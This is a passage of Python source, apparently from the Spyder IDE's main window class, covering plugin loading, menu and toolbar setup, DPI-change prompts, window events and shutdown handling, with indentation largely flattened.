        # e.g. layout (Qt) vs. layout (SpyderPluginV2)
self._INTERNAL_PLUGINS_MAPPING = {
'console': Plugins.Console,
'maininterpreter': Plugins.MainInterpreter,
'outlineexplorer': Plugins.OutlineExplorer,
'variableexplorer': Plugins.VariableExplorer,
'ipyconsole': Plugins.IPythonConsole,
'workingdirectory': Plugins.WorkingDirectory,
'projects': Plugins.Projects,
'findinfiles': Plugins.Find,
'layouts': Plugins.Layout,
}
self.thirdparty_plugins = []
# Tour
# TODO: Should be a plugin
self.tour = None
self.tours_available = None
self.tour_dialog = None
# File switcher
self.switcher = None
# Preferences
self.prefs_dialog_size = None
self.prefs_dialog_instance = None
# Actions
self.undo_action = None
self.redo_action = None
self.copy_action = None
self.cut_action = None
self.paste_action = None
self.selectall_action = None
# Menu bars
self.edit_menu = None
self.edit_menu_actions = []
self.search_menu = None
self.search_menu_actions = []
self.source_menu = None
self.source_menu_actions = []
self.run_menu = None
self.run_menu_actions = []
self.debug_menu = None
self.debug_menu_actions = []
# TODO: Move to corresponding Plugins
self.main_toolbar = None
self.main_toolbar_actions = []
self.file_toolbar = None
self.file_toolbar_actions = []
self.run_toolbar = None
self.run_toolbar_actions = []
self.debug_toolbar = None
self.debug_toolbar_actions = []
self.menus = []
if running_under_pytest():
# Show errors in internal console when testing.
CONF.set('main', 'show_internal_errors', False)
self.CURSORBLINK_OSDEFAULT = QApplication.cursorFlashTime()
        if set_windows_appusermodelid is not None:
res = set_windows_appusermodelid()
logger.info("appusermodelid: %s", res)
# Setting QTimer if running in travis
test_app = os.environ.get('TEST_CI_APP')
if test_app is not None:
app = qapplication()
timer_shutdown_time = 30000
self.timer_shutdown = QTimer(self)
self.timer_shutdown.timeout.connect(app.quit)
self.timer_shutdown.start(timer_shutdown_time)
# Showing splash screen
self.splash = splash
if CONF.get('main', 'current_version', '') != __version__:
CONF.set('main', 'current_version', __version__)
# Execute here the actions to be performed only once after
# each update (there is nothing there for now, but it could
# be useful some day...)
# List of satellite widgets (registered in add_dockwidget):
self.widgetlist = []
# Flags used if closing() is called by the exit() shell command
self.already_closed = False
self.is_starting_up = True
self.is_setting_up = True
self.floating_dockwidgets = []
self.window_size = None
self.window_position = None
# To keep track of the last focused widget
self.last_focused_widget = None
self.previous_focused_widget = None
# Keep track of dpi message
self.show_dpi_message = True
# Server to open external files on a single instance
# This is needed in order to handle socket creation problems.
# See spyder-ide/spyder#4132.
if os.name == 'nt':
try:
self.open_files_server = socket.socket(socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP)
except OSError:
self.open_files_server = None
QMessageBox.warning(None, "Spyder",
_("An error occurred while creating a socket needed "
"by Spyder. Please, try to run as an Administrator "
"from cmd.exe the following command and then "
"restart your computer: <br><br><span "
"style=\'color: {color}\'><b>netsh winsock reset "
"</b></span><br>").format(
color=QStylePalette.COLOR_BACKGROUND_4))
else:
self.open_files_server = socket.socket(socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP)
# To show the message about starting the tour
self.sig_setup_finished.connect(self.show_tour_message)
# Apply main window settings
self.apply_settings()
# To set all dockwidgets tabs to be on top (in case we want to do it
# in the future)
# self.setTabPosition(Qt.AllDockWidgetAreas, QTabWidget.North)
logger.info("End of MainWindow constructor")
# --- Window setup
def _update_shortcuts_in_panes_menu(self, show=True):
"""
Display the shortcut for the "Switch to plugin..." on the toggle view
action of the plugins displayed in the Help/Panes menu.
Notes
-----
SpyderDockablePlugins provide two actions that function as a single
action. The `Switch to Plugin...` action has an assignable shortcut
via the shortcut preferences. The `Plugin toggle View` in the `View`
application menu, uses a custom `Toggle view action` that displays the
shortcut assigned to the `Switch to Plugin...` action, but is not
triggered by that shortcut.
"""
for plugin_id, plugin in self._PLUGINS.items():
if isinstance(plugin, SpyderDockablePlugin):
try:
# New API
action = plugin.toggle_view_action
except AttributeError:
# Old API
action = plugin._toggle_view_action
if show:
section = plugin.CONF_SECTION
try:
context = '_'
name = 'switch to {}'.format(section)
shortcut = CONF.get_shortcut(
context, name, plugin_name=section)
except (cp.NoSectionError, cp.NoOptionError):
shortcut = QKeySequence()
else:
shortcut = QKeySequence()
action.setShortcut(shortcut)
def setup(self):
"""Setup main window."""
# TODO: Remove circular dependency between help and ipython console
# and remove this import. Help plugin should take care of it
from spyder.plugins.help.utils.sphinxify import CSS_PATH, DARK_CSS_PATH
logger.info("*** Start of MainWindow setup ***")
logger.info("Updating PYTHONPATH")
path_dict = self.get_spyder_pythonpath_dict()
self.update_python_path(path_dict)
logger.info("Applying theme configuration...")
ui_theme = CONF.get('appearance', 'ui_theme')
color_scheme = CONF.get('appearance', 'selected')
if ui_theme == 'dark':
if not running_under_pytest():
# Set style proxy to fix combobox popup on mac and qdark
qapp = QApplication.instance()
qapp.setStyle(self._proxy_style)
dark_qss = str(APP_STYLESHEET)
self.setStyleSheet(dark_qss)
self.statusBar().setStyleSheet(dark_qss)
css_path = DARK_CSS_PATH
elif ui_theme == 'light':
if not running_under_pytest():
# Set style proxy to fix combobox popup on mac and qdark
qapp = QApplication.instance()
qapp.setStyle(self._proxy_style)
light_qss = str(APP_STYLESHEET)
self.setStyleSheet(light_qss)
self.statusBar().setStyleSheet(light_qss)
css_path = CSS_PATH
elif ui_theme == 'automatic':
if not is_dark_font_color(color_scheme):
if not running_under_pytest():
# Set style proxy to fix combobox popup on mac and qdark
qapp = QApplication.instance()
qapp.setStyle(self._proxy_style)
dark_qss = str(APP_STYLESHEET)
self.setStyleSheet(dark_qss)
self.statusBar().setStyleSheet(dark_qss)
css_path = DARK_CSS_PATH
else:
light_qss = str(APP_STYLESHEET)
self.setStyleSheet(light_qss)
self.statusBar().setStyleSheet(light_qss)
css_path = CSS_PATH
# Set css_path as a configuration to be used by the plugins
CONF.set('appearance', 'css_path', css_path)
# Status bar
status = self.statusBar()
status.setObjectName("StatusBar")
status.showMessage(_("Welcome to Spyder!"), 5000)
# Switcher instance
logger.info("Loading switcher...")
self.create_switcher()
message = _(
"Spyder Internal Console\n\n"
"This console is used to report application\n"
"internal errors and to inspect Spyder\n"
"internals with the following commands:\n"
" spy.app, spy.window, dir(spy)\n\n"
"Please don't use it to run your code\n\n"
)
CONF.set('internal_console', 'message', message)
CONF.set('internal_console', 'multithreaded', self.multithreaded)
CONF.set('internal_console', 'profile', self.profile)
CONF.set('internal_console', 'commands', [])
CONF.set('internal_console', 'namespace', {})
CONF.set('internal_console', 'show_internal_errors', True)
# Working directory initialization
CONF.set('workingdir', 'init_workdir', self.init_workdir)
# Load and register internal and external plugins
external_plugins = find_external_plugins()
internal_plugins = find_internal_plugins()
all_plugins = external_plugins.copy()
all_plugins.update(internal_plugins.copy())
# Determine 'enable' config for the plugins that have it
enabled_plugins = {}
for plugin in all_plugins.values():
plugin_name = plugin.NAME
plugin_main_attribute_name = (
self._INTERNAL_PLUGINS_MAPPING[plugin_name]
if plugin_name in self._INTERNAL_PLUGINS_MAPPING
else plugin_name)
try:
if CONF.get(plugin_main_attribute_name, "enable"):
enabled_plugins[plugin_name] = plugin
except (cp.NoOptionError, cp.NoSectionError):
enabled_plugins[plugin_name] = plugin
# Get ordered list of plugins classes and instantiate them
plugin_deps = solve_plugin_dependencies(list(enabled_plugins.values()))
for plugin_class in plugin_deps:
plugin_name = plugin_class.NAME
# Non-migrated plugins
if plugin_name in [
Plugins.Editor,
Plugins.IPythonConsole]:
if plugin_name == Plugins.IPythonConsole:
plugin_instance = plugin_class(self)
plugin_instance.sig_exception_occurred.connect(
self.handle_exception)
else:
plugin_instance = plugin_class(self)
plugin_instance.register_plugin()
self.add_plugin(plugin_instance)
self.preferences.register_plugin_preferences(
plugin_instance)
# Migrated or new plugins
elif plugin_name in [
Plugins.MainMenu,
Plugins.OnlineHelp,
Plugins.Toolbar,
Plugins.Preferences,
Plugins.Appearance,
Plugins.Run,
Plugins.Shortcuts,
Plugins.StatusBar,
Plugins.Completions,
Plugins.OutlineExplorer,
Plugins.Console,
Plugins.MainInterpreter,
Plugins.Breakpoints,
Plugins.History,
Plugins.Profiler,
Plugins.Explorer,
Plugins.Help,
Plugins.Plots,
Plugins.VariableExplorer,
Plugins.Application,
Plugins.Find,
Plugins.Pylint,
Plugins.WorkingDirectory,
Plugins.Projects,
Plugins.Layout]:
plugin_instance = plugin_class(self, configuration=CONF)
self.register_plugin(plugin_instance)
# TODO: Check thirdparty attribute usage
# For now append plugins to the thirdparty attribute as was
# being done
if plugin_name in [
Plugins.Breakpoints,
Plugins.Profiler,
Plugins.Pylint]:
self.thirdparty_plugins.append(plugin_instance)
# Load external_plugins adding their dependencies
elif (issubclass(plugin_class, SpyderPluginV2) and
plugin_class.NAME in external_plugins):
try:
if plugin_class.CONF_FILE:
CONF.register_plugin(plugin_class)
plugin_instance = plugin_class(
self,
configuration=CONF,
)
self.register_plugin(plugin_instance, external=True,
omit_conf=plugin_class.CONF_FILE)
# These attributes come from spyder.app.solver to add
# plugins to the dependencies dialog
if not running_under_pytest():
module = plugin_class._spyder_module_name
package_name = plugin_class._spyder_package_name
version = plugin_class._spyder_version
description = plugin_instance.get_description()
dependencies.add(
module, package_name, description, version, None,
kind=dependencies.PLUGIN)
except Exception as error:
print("%s: %s" % (plugin_class, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
self.set_splash(_("Loading old third-party plugins..."))
for mod in get_spyderplugins_mods():
try:
plugin = mod.PLUGIN_CLASS(self)
if plugin.check_compatibility()[0]:
if hasattr(plugin, 'CONFIGWIDGET_CLASS'):
self.preferences.register_plugin_preferences(plugin)
if hasattr(plugin, 'COMPLETION_PROVIDER_NAME'):
self.completions.register_completion_plugin(plugin)
else:
self.thirdparty_plugins.append(plugin)
plugin.register_plugin()
# Add to dependencies dialog
module = mod.__name__
name = module.replace('_', '-')
if plugin.DESCRIPTION:
description = plugin.DESCRIPTION
else:
description = plugin.get_plugin_title()
dependencies.add(module, name, description,
'', None, kind=dependencies.PLUGIN)
except TypeError:
# Fixes spyder-ide/spyder#13977
pass
except Exception as error:
print("%s: %s" % (mod, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
# Set window title
self.set_window_title()
# Menus
# TODO: Remove when all menus are migrated to use the Main Menu Plugin
logger.info("Creating Menus...")
from spyder.api.widgets.menus import SpyderMenu
from spyder.plugins.mainmenu.api import (
ApplicationMenus, HelpMenuSections, ToolsMenuSections,
FileMenuSections)
mainmenu = self.mainmenu
self.edit_menu = mainmenu.get_application_menu("edit_menu")
self.search_menu = mainmenu.get_application_menu("search_menu")
self.source_menu = mainmenu.get_application_menu("source_menu")
self.source_menu.aboutToShow.connect(self.update_source_menu)
self.run_menu = mainmenu.get_application_menu("run_menu")
self.debug_menu = mainmenu.get_application_menu("debug_menu")
# Switcher shortcuts
self.file_switcher_action = create_action(
self,
_('File switcher...'),
icon=ima.icon('filelist'),
tip=_('Fast switch between files'),
triggered=self.open_switcher,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.file_switcher_action, context="_",
name="File switcher")
self.symbol_finder_action = create_action(
self, _('Symbol finder...'),
icon=ima.icon('symbol_find'),
tip=_('Fast symbol search in file'),
triggered=self.open_symbolfinder,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.symbol_finder_action, context="_",
name="symbol finder", add_shortcut_to_tip=True)
def create_edit_action(text, tr_text, icon):
textseq = text.split(' ')
method_name = textseq[0].lower()+"".join(textseq[1:])
action = create_action(self, tr_text,
icon=icon,
triggered=self.global_callback,
data=method_name,
context=Qt.WidgetShortcut)
self.register_shortcut(action, "Editor", text)
return action
self.undo_action = create_edit_action('Undo', _('Undo'),
ima.icon('undo'))
self.redo_action = create_edit_action('Redo', _('Redo'),
ima.icon('redo'))
self.copy_action = create_edit_action('Copy', _('Copy'),
ima.icon('editcopy'))
self.cut_action = create_edit_action('Cut', _('Cut'),
ima.icon('editcut'))
self.paste_action = create_edit_action('Paste', _('Paste'),
ima.icon('editpaste'))
self.selectall_action = create_edit_action("Select All",
_("Select All"),
ima.icon('selectall'))
self.edit_menu_actions += [self.undo_action, self.redo_action,
None, self.cut_action, self.copy_action,
self.paste_action, self.selectall_action,
None] + self.editor.edit_menu_actions
switcher_actions = [
self.file_switcher_action,
self.symbol_finder_action
]
for switcher_action in switcher_actions:
mainmenu.add_item_to_application_menu(
switcher_action,
menu_id=ApplicationMenus.File,
section=FileMenuSections.Switcher,
before_section=FileMenuSections.Restart)
self.set_splash("")
# Toolbars
# TODO: Remove after finishing the migration
logger.info("Creating toolbars...")
toolbar = self.toolbar
self.file_toolbar = toolbar.get_application_toolbar("file_toolbar")
self.run_toolbar = toolbar.get_application_toolbar("run_toolbar")
self.debug_toolbar = toolbar.get_application_toolbar("debug_toolbar")
self.main_toolbar = toolbar.get_application_toolbar("main_toolbar")
# Tools + External Tools (some of this depends on the Application
# plugin)
logger.info("Creating Tools menu...")
spyder_path_action = create_action(
self,
_("PYTHONPATH manager"),
None, icon=ima.icon('pythonpath'),
triggered=self.show_path_manager,
tip=_("PYTHONPATH manager"),
menurole=QAction.ApplicationSpecificRole)
from spyder.plugins.application.plugin import (
ApplicationActions, WinUserEnvDialog)
winenv_action = None
if WinUserEnvDialog:
winenv_action = self.application.get_action(
ApplicationActions.SpyderWindowsEnvVariables)
mainmenu.add_item_to_application_menu(
spyder_path_action,
menu_id=ApplicationMenus.Tools,
section=ToolsMenuSections.Tools,
before=winenv_action
)
if get_debug_level() >= 3:
self.menu_lsp_logs = QMenu(_("LSP logs"))
self.menu_lsp_logs.aboutToShow.connect(self.update_lsp_logs)
mainmenu.add_item_to_application_menu(
self.menu_lsp_logs,
menu_id=ApplicationMenus.Tools)
# Main toolbar
from spyder.plugins.toolbar.api import (
ApplicationToolbars, MainToolbarSections)
self.toolbar.add_item_to_application_toolbar(
spyder_path_action,
toolbar_id=ApplicationToolbars.Main,
section=MainToolbarSections.ApplicationSection
)
self.set_splash(_("Setting up main window..."))
#----- Tours
# TODO: Move tours to a plugin structure
self.tour = tour.AnimatedTour(self)
# self.tours_menu = QMenu(_("Interactive tours"), self)
# self.tour_menu_actions = []
# # TODO: Only show intro tour for now. When we are close to finish
# # 3.0, we will finish and show the other tour
self.tours_available = tour.get_tours(DEFAULT_TOUR)
for i, tour_available in enumerate(self.tours_available):
self.tours_available[i]['last'] = 0
tour_name = tour_available['name']
# def trigger(i=i, self=self): # closure needed!
# return lambda: self.show_tour(i)
# temp_action = create_action(self, tour_name, tip="",
# triggered=trigger())
# self.tour_menu_actions += [temp_action]
# self.tours_menu.addActions(self.tour_menu_actions)
self.tour_action = create_action(
self,
self.tours_available[DEFAULT_TOUR]['name'],
tip=_("Interactive tour introducing Spyder's panes and features"),
triggered=lambda: self.show_tour(DEFAULT_TOUR))
mainmenu.add_item_to_application_menu(
self.tour_action,
menu_id=ApplicationMenus.Help,
section=HelpMenuSections.Documentation)
# TODO: Migrate to use the MainMenu Plugin instead of list of actions
# Filling out menu/toolbar entries:
add_actions(self.edit_menu, self.edit_menu_actions)
add_actions(self.search_menu, self.search_menu_actions)
add_actions(self.source_menu, self.source_menu_actions)
add_actions(self.run_menu, self.run_menu_actions)
add_actions(self.debug_menu, self.debug_menu_actions)
# Emitting the signal notifying plugins that main window menu and
# toolbar actions are all defined:
self.all_actions_defined.emit()
def __getattr__(self, attr):
"""
Redefinition of __getattr__ to enable access to plugins.
        Loaded plugins can be accessed as attributes of the main window,
        e.g. self.console or self.main.console, preserving the same
        accessors as before.
"""
        # Mapping of new plugin identifiers to the old attribute
        # names used for plugins
if attr in self._INTERNAL_PLUGINS_MAPPING.keys():
return self.get_plugin(self._INTERNAL_PLUGINS_MAPPING[attr])
try:
return self.get_plugin(attr)
except SpyderAPIError:
pass
return super().__getattr__(attr)
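    # Illustrative note (added, not in the original code): with the mapping above,
    # an old-style attribute access such as ``self.console`` is redirected to
    # ``self.get_plugin(...)`` for the corresponding plugin identifier, and only
    # falls back to ``super().__getattr__`` when no registered plugin matches.
    # The exact keys depend on _INTERNAL_PLUGINS_MAPPING, so treat this as a
    # sketch of the lookup order rather than a guarantee.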
def update_lsp_logs(self):
"""Create an action for each lsp log file."""
self.menu_lsp_logs.clear()
lsp_logs = []
files = glob.glob(osp.join(get_conf_path('lsp_logs'), '*.log'))
for f in files:
action = create_action(self, f, triggered=self.editor.load)
action.setData(f)
lsp_logs.append(action)
add_actions(self.menu_lsp_logs, lsp_logs)
def pre_visible_setup(self):
"""
Actions to be performed before the main window is visible.
The actions here are related with setting up the main window.
"""
logger.info("Setting up window...")
# Create external plugins before loading the layout to include them in
# the window restore state after restarts.
for plugin, plugin_instance in self._EXTERNAL_PLUGINS.items():
self.tabify_plugin(plugin_instance, Plugins.Console)
if isinstance(plugin_instance, SpyderDockablePlugin):
plugin_instance.get_widget().toggle_view(False)
for plugin_id, plugin_instance in self._PLUGINS.items():
try:
plugin_instance.before_mainwindow_visible()
except AttributeError:
pass
if self.splash is not None:
self.splash.hide()
# Menu about to show
for child in self.menuBar().children():
if isinstance(child, QMenu):
try:
child.aboutToShow.connect(self.update_edit_menu)
child.aboutToShow.connect(self.update_search_menu)
except TypeError:
pass
# Register custom layouts
for plugin, plugin_instance in self._PLUGINS.items():
if hasattr(plugin_instance, 'CUSTOM_LAYOUTS'):
if isinstance(plugin_instance.CUSTOM_LAYOUTS, list):
for custom_layout in plugin_instance.CUSTOM_LAYOUTS:
self.layouts.register_layout(
self, custom_layout)
else:
logger.info(
'Unable to load custom layouts for {}. '
'Expecting a list of layout classes but got {}'
.format(plugin, plugin_instance.CUSTOM_LAYOUTS)
)
self.layouts.update_layout_menu_actions()
logger.info("*** End of MainWindow setup ***")
self.is_starting_up = False
def post_visible_setup(self):
"""Actions to be performed only after the main window's `show` method
was triggered"""
for __, plugin in self._PLUGINS.items():
try:
plugin.on_mainwindow_visible()
except AttributeError:
pass
self.restore_scrollbar_position.emit()
logger.info('Deleting previous Spyder instance LSP logs...')
delete_lsp_log_files()
# Workaround for spyder-ide/spyder#880.
# QDockWidget objects are not painted if restored as floating
# windows, so we must dock them before showing the mainwindow,
# then set them again as floating windows here.
for widget in self.floating_dockwidgets:
widget.setFloating(True)
# Server to maintain just one Spyder instance and open files in it if
# the user tries to start other instances with
# $ spyder foo.py
if (CONF.get('main', 'single_instance') and not self.new_instance
and self.open_files_server):
t = threading.Thread(target=self.start_open_files_server)
t.setDaemon(True)
t.start()
# Connect the window to the signal emitted by the previous server
# when it gets a client connected to it
self.sig_open_external_file.connect(self.open_external_file)
# Hide Internal Console so that people don't use it instead of
# the External or IPython ones
if self.console.dockwidget.isVisible() and DEV is None:
self.console.toggle_view_action.setChecked(False)
self.console.dockwidget.hide()
# Show Help and Consoles by default
plugins_to_show = [self.ipyconsole]
if self.help is not None:
plugins_to_show.append(self.help)
for plugin in plugins_to_show:
if plugin.dockwidget.isVisible():
plugin.dockwidget.raise_()
# Update plugins toggle actions to show the "Switch to" plugin shortcut
self._update_shortcuts_in_panes_menu()
# Process pending events and hide splash before loading the
# previous session.
QApplication.processEvents()
if self.splash is not None:
self.splash.hide()
# TODO: Remove this reference to projects once we can send the command
# line options to the plugins.
if self.open_project:
if not running_in_mac_app():
self.projects.open_project(
self.open_project, workdir=self.init_workdir
)
else:
# Load last project if a project was active when Spyder
# was closed
self.projects.reopen_last_project()
# If no project is active, load last session
if self.projects.get_active_project() is None:
self.editor.setup_open_files(close_previous_files=False)
# Raise the menuBar to the top of the main window widget's stack
# Fixes spyder-ide/spyder#3887.
self.menuBar().raise_()
# Handle DPI scale and window changes to show a restart message.
# Don't activate this functionality on macOS because it's being
# triggered in the wrong situations.
# See spyder-ide/spyder#11846
if not sys.platform == 'darwin':
window = self.window().windowHandle()
window.screenChanged.connect(self.handle_new_screen)
screen = self.window().windowHandle().screen()
self.current_dpi = screen.logicalDotsPerInch()
screen.logicalDotsPerInchChanged.connect(
self.show_dpi_change_message)
# Notify that the setup of the mainwindow was finished
self.is_setting_up = False
self.sig_setup_finished.emit()
def handle_new_screen(self, new_screen):
"""Connect DPI signals for new screen."""
if new_screen is not None:
new_screen_dpi = new_screen.logicalDotsPerInch()
if self.current_dpi != new_screen_dpi:
self.show_dpi_change_message(new_screen_dpi)
else:
new_screen.logicalDotsPerInchChanged.connect(
self.show_dpi_change_message)
def handle_dpi_change_response(self, result, dpi):
"""Handle dpi change message dialog result."""
if self.dpi_change_dismiss_box.isChecked():
self.show_dpi_message = False
self.dpi_change_dismiss_box = None
if result == 0: # Restart button was clicked
# Activate HDPI auto-scaling option since is needed for a
# proper display when using OS scaling
CONF.set('main', 'normal_screen_resolution', False)
CONF.set('main', 'high_dpi_scaling', True)
CONF.set('main', 'high_dpi_custom_scale_factor', False)
self.restart()
else:
# Update current dpi for future checks
self.current_dpi = dpi
def show_dpi_change_message(self, dpi):
"""Show message to restart Spyder since the DPI scale changed."""
if not self.show_dpi_message:
return
if self.current_dpi != dpi:
# Check the window state to not show the message if the window
# is in fullscreen mode.
window = self.window().windowHandle()
if (window.windowState() == Qt.WindowFullScreen and
sys.platform == 'darwin'):
return
self.dpi_change_dismiss_box = QCheckBox(
_("Hide this message during the current session"),
self
)
msgbox = QMessageBox(self)
msgbox.setIcon(QMessageBox.Warning)
            msgbox.setText(_(
                "A monitor scale change was detected. <br><br>"
                "We recommend restarting Spyder to ensure that it's properly "
                "displayed. If you don't want to do that, please be sure to "
                "activate the option<br><br><tt>Enable auto high DPI scaling"
                "</tt><br><br>in <tt>Preferences > Application > "
                "Interface</tt>, in case Spyder is not displayed "
                "correctly.<br><br>"
                "Do you want to restart Spyder?"))
msgbox.addButton(_('Restart now'), QMessageBox.NoRole)
dismiss_button = msgbox.addButton(
_('Dismiss'), QMessageBox.NoRole)
msgbox.setCheckBox(self.dpi_change_dismiss_box)
msgbox.setDefaultButton(dismiss_button)
msgbox.finished.connect(
lambda result: self.handle_dpi_change_response(result, dpi))
msgbox.open()
def set_window_title(self):
"""Set window title."""
if DEV is not None:
title = u"Spyder %s (Python %s.%s)" % (__version__,
sys.version_info[0],
sys.version_info[1])
elif running_in_mac_app() or is_pynsist():
title = "Spyder"
else:
title = u"Spyder (Python %s.%s)" % (sys.version_info[0],
sys.version_info[1])
if get_debug_level():
title += u" [DEBUG MODE %d]" % get_debug_level()
if self.window_title is not None:
title += u' -- ' + to_text_string(self.window_title)
# TODO: Remove self.projects reference once there's an API for setting
# window title.
if self.projects is not None:
path = self.projects.get_active_project_path()
if path:
path = path.replace(get_home_dir(), u'~')
title = u'{0} - {1}'.format(path, title)
self.base_title = title
self.setWindowTitle(self.base_title)
# TODO: To be removed after all actions are moved to their corresponding
# plugins
def register_shortcut(self, qaction_or_qshortcut, context, name,
add_shortcut_to_tip=True, plugin_name=None):
self.shortcuts.register_shortcut(
qaction_or_qshortcut,
context,
name,
add_shortcut_to_tip=add_shortcut_to_tip,
plugin_name=plugin_name,
)
# --- Other
def update_source_menu(self):
"""Update source menu options that vary dynamically."""
# This is necessary to avoid an error at startup.
# Fixes spyder-ide/spyder#14901
try:
self.editor.refresh_formatter_name()
except AttributeError:
pass
def free_memory(self):
"""Free memory after event."""
gc.collect()
def plugin_focus_changed(self):
"""Focus has changed from one plugin to another"""
self.update_edit_menu()
self.update_search_menu()
def show_shortcuts(self, menu):
"""Show action shortcuts in menu."""
menu_actions = menu.actions()
for action in menu_actions:
if getattr(action, '_shown_shortcut', False):
# This is a SpyderAction
if action._shown_shortcut is not None:
action.setShortcut(action._shown_shortcut)
elif action.menu() is not None:
                # This is a submenu, so we need to call this again
self.show_shortcuts(action.menu())
else:
# We don't need to do anything for other elements
continue
def hide_shortcuts(self, menu):
"""Hide action shortcuts in menu."""
menu_actions = menu.actions()
for action in menu_actions:
if getattr(action, '_shown_shortcut', False):
# This is a SpyderAction
if action._shown_shortcut is not None:
action.setShortcut(QKeySequence())
elif action.menu() is not None:
                # This is a submenu, so we need to call this again
self.hide_shortcuts(action.menu())
else:
# We don't need to do anything for other elements
continue
def hide_options_menus(self):
"""Hide options menu when menubar is pressed in macOS."""
for plugin in self.widgetlist + self.thirdparty_plugins:
if plugin.CONF_SECTION == 'editor':
editorstack = self.editor.get_current_editorstack()
editorstack.menu.hide()
else:
try:
# New API
plugin.options_menu.hide()
except AttributeError:
# Old API
plugin._options_menu.hide()
def get_focus_widget_properties(self):
"""Get properties of focus widget
Returns tuple (widget, properties) where properties is a tuple of
booleans: (is_console, not_readonly, readwrite_editor)"""
from spyder.plugins.editor.widgets.base import TextEditBaseWidget
from spyder.plugins.ipythonconsole.widgets import ControlWidget
widget = QApplication.focusWidget()
textedit_properties = None
if isinstance(widget, (TextEditBaseWidget, ControlWidget)):
console = isinstance(widget, ControlWidget)
not_readonly = not widget.isReadOnly()
readwrite_editor = not_readonly and not console
textedit_properties = (console, not_readonly, readwrite_editor)
return widget, textedit_properties
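    # Example reading of the return value (illustrative, not from the original
    # sources): a writable Editor widget yields
    # (console=False, not_readonly=True, readwrite_editor=True); an IPython
    # ControlWidget typically yields (True, True, False); any other focused
    # widget leaves textedit_properties as None, which is how
    # update_edit_menu/update_search_menu below detect "not an editor/console".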
def update_edit_menu(self):
"""Update edit menu"""
widget, textedit_properties = self.get_focus_widget_properties()
if textedit_properties is None: # widget is not an editor/console
return
# !!! Below this line, widget is expected to be a QPlainTextEdit
# instance
console, not_readonly, readwrite_editor = textedit_properties
# Editor has focus and there is no file opened in it
if (not console and not_readonly and self.editor
and not self.editor.is_file_opened()):
return
# Disabling all actions to begin with
for child in self.edit_menu.actions():
child.setEnabled(False)
self.selectall_action.setEnabled(True)
# Undo, redo
        self.undo_action.setEnabled(
            readwrite_editor and widget.document().isUndoAvailable())
        self.redo_action.setEnabled(
            readwrite_editor and widget.document().isRedoAvailable())
# Copy, cut, paste, delete
has_selection = widget.has_selected_text()
self.copy_action.setEnabled(has_selection)
self.cut_action.setEnabled(has_selection and not_readonly)
self.paste_action.setEnabled(not_readonly)
# Comment, uncomment, indent, unindent...
if not console and not_readonly:
# This is the editor and current file is writable
if self.editor:
for action in self.editor.edit_menu_actions:
action.setEnabled(True)
def update_search_menu(self):
"""Update search menu"""
# Disabling all actions except the last one
# (which is Find in files) to begin with
for child in self.search_menu.actions()[:-1]:
child.setEnabled(False)
widget, textedit_properties = self.get_focus_widget_properties()
if textedit_properties is None: # widget is not an editor/console
return
# !!! Below this line, widget is expected to be a QPlainTextEdit
# instance
console, not_readonly, readwrite_editor = textedit_properties
# Find actions only trigger an effect in the Editor
if not console:
for action in self.search_menu.actions():
try:
action.setEnabled(True)
except RuntimeError:
pass
# Disable the replace action for read-only files
if len(self.search_menu_actions) > 3:
self.search_menu_actions[3].setEnabled(readwrite_editor)
def createPopupMenu(self):
return self.application.get_application_context_menu(parent=self)
def set_splash(self, message):
"""Set splash message"""
if self.splash is None:
return
if message:
logger.info(message)
self.splash.show()
self.splash.showMessage(message,
int(Qt.AlignBottom | Qt.AlignCenter |
Qt.AlignAbsolute),
QColor(Qt.white))
QApplication.processEvents()
def closeEvent(self, event):
"""closeEvent reimplementation"""
if self.closing(True):
event.accept()
else:
event.ignore()
def resizeEvent(self, event):
"""Reimplement Qt method"""
if not self.isMaximized() and not self.layouts.get_fullscreen_flag():
self.window_size = self.size()
QMainWindow.resizeEvent(self, event)
# To be used by the tour to be able to resize
self.sig_resized.emit(event)
def moveEvent(self, event):
"""Reimplement Qt method"""
if not self.isMaximized() and not self.layouts.get_fullscreen_flag():
self.window_position = self.pos()
QMainWindow.moveEvent(self, event)
# To be used by the tour to be able to move
self.sig_moved.emit(event)
def hideEvent(self, event):
"""Reimplement Qt method"""
try:
for plugin in (self.widgetlist + self.thirdparty_plugins):
# TODO: Remove old API
try:
# New API
if plugin.get_widget().isAncestorOf(
self.last_focused_widget):
plugin.change_visibility(True)
except AttributeError:
# Old API
if plugin.isAncestorOf(self.last_focused_widget):
plugin._visibility_changed(True)
QMainWindow.hideEvent(self, event)
except RuntimeError:
QMainWindow.hideEvent(self, event)
def change_last_focused_widget(self, old, now):
"""To keep track of to the last focused widget"""
if (now is None and QApplication.activeWindow() is not None):
QApplication.activeWindow().setFocus()
self.last_focused_widget = QApplication.focusWidget()
elif now is not None:
self.last_focused_widget = now
self.previous_focused_widget = old
def closing(self, cancelable=False):
"""Exit tasks"""
if self.already_closed or self.is_starting_up:
return True
if cancelable and CONF.get('main', 'prompt_on_exit'):
reply = QMessageBox.critical(self, 'Spyder',
'Do you really want to exit?',
QMessageBox.Yes, QMessageBox.No)
if reply == QMessageBox.No:
return False
if CONF.get('main', 'single_instance') and self.open_files_server:
self.open_files_server.close()
# Internal plugins
for plugin in (self.widgetlist + self.thirdparty_plugins):
# New API
try:
if isinstance(plugin, SpyderDockablePlugin):
plugin.close_window()
if not plugin.on_close(cancelable):
return False
except AttributeError:
pass
# Old API
try:
plugin._close_window()
if not plugin.closing_plugin(cancelable):
return False
except AttributeError:
pass
# New API: External plugins
for plugin_name, plugin in self._EXTERNAL_PLUGINS.items():
try:
if isinstance(plugin, SpyderDockablePlugin):
plugin.close_window()
if not plugin.on_close(cancelable):
return False
except AttributeError as e:
logger.error(str(e))
# Save window settings *after* closing all plugin windows, in order
# to show them in their previous locations in the next session.
# Fixes spyder-ide/spyder#12139
prefix = 'window' + '/'
self.layouts.save_current_window_settings(prefix)
self.already_closed = True
return True
def add_dockwidget(self, plugin):
"""
Add a plugin QDockWidget to the main window.
"""
try:
# New API
if plugin.is_compatible:
dockwidget, location = plugin.create_dockwidget(self)
self.addDockWidget(location, dockwidget)
self.widgetlist.append(plugin)
except AttributeError:
# Old API
if plugin._is_compatible:
dockwidget, location = plugin._create_dockwidget()
self.addDockWidget(location, dockwidget)
self.widgetlist.append(plugin)
@Slot()
def global_callback(self):
"""Global callback"""
